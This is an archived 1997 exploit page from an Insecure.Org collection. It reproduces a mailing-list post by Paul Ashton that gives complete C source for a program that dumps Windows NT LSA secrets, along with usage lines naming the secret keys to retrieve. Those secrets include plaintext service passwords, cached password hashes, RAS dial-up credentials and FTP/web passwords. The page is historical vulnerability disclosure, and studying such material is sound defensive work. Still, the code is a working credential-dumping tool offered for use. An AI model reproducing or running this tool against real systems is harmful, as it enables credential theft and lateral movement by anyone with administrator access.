NT LSA secrets

Summary
Description:This program allows you to obtain verious LSA secrets such as service passwords, cached password hashes of recent users, and a bunch of others.
Author:Paul Ashton <paul@ARGO.DEMON.CO.UK>
Compromise:The administrator (or someone who has hacked admin) of an NT box can find a lot of juicy information which M$ tried to hide.
Vulnerable Systems:Presumably just NT (4.0, maybe 3.51) boxes.
Date:9 August 1997
Details


Date: Sat, 9 Aug 1997 20:06:38 +0100
From: Paul Ashton <paul@ARGO.DEMON.CO.UK>
To: NTBUGTRAQ@RC.ON.CA
Subject: LSA secrets

Following on from the service password issue I raised some time ago,
here's a little program that will dump various LSA secrets such
as service passwords (plain text), cached password hashes of the
last users to login to a machine, FTP, WEB, etc. plaintext
passwords, RAS dial up account names, passwords etc, workstation
passwords for domain access, etc.

run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data
or any other registry key under NTLM\security\policy\secrets.

The moral? If only microsoft would document just 10% of the
APIs, maybe people wouldn't make an issue of these things.

NOTE: THIS HAS TO BE RUN AS AN ADMINISTRATOR, OK?!

Cheers
Paul
ps. Sorry about the coding, but win32 programming is so tedious.

#include <windows.h>
#include <stdio.h>

#include "ntsecapi.h"
#define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else
void write();

PLSA_UNICODE_STRING
str(LPWSTR x)
{
    static LSA_UNICODE_STRING s;

    s.Buffer=x;
    s.Length=wcslen(x)*sizeof(WCHAR);
    s.MaximumLength = (wcslen(x)+1)*2;
    return &s;
}

int _cdecl
main(int argc, char *argv[])
{
    LSA_HANDLE pol;
    PLSA_UNICODE_STRING foo;
    LSA_OBJECT_ATTRIBUTES attrs;
    WCHAR keyname[256]=L"";
    WCHAR host[256]=L"";

    wsprintfW(keyname, L"%hS", argv[1]);
    if(argc == 3) wsprintfW(host, L"%hS", argv[2]);
    memset(&attrs, 0, sizeof(attrs));
    AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
    AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));
    write(1, foo->Buffer, foo->Length);
    LsaClose(pol);
    exit(0);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault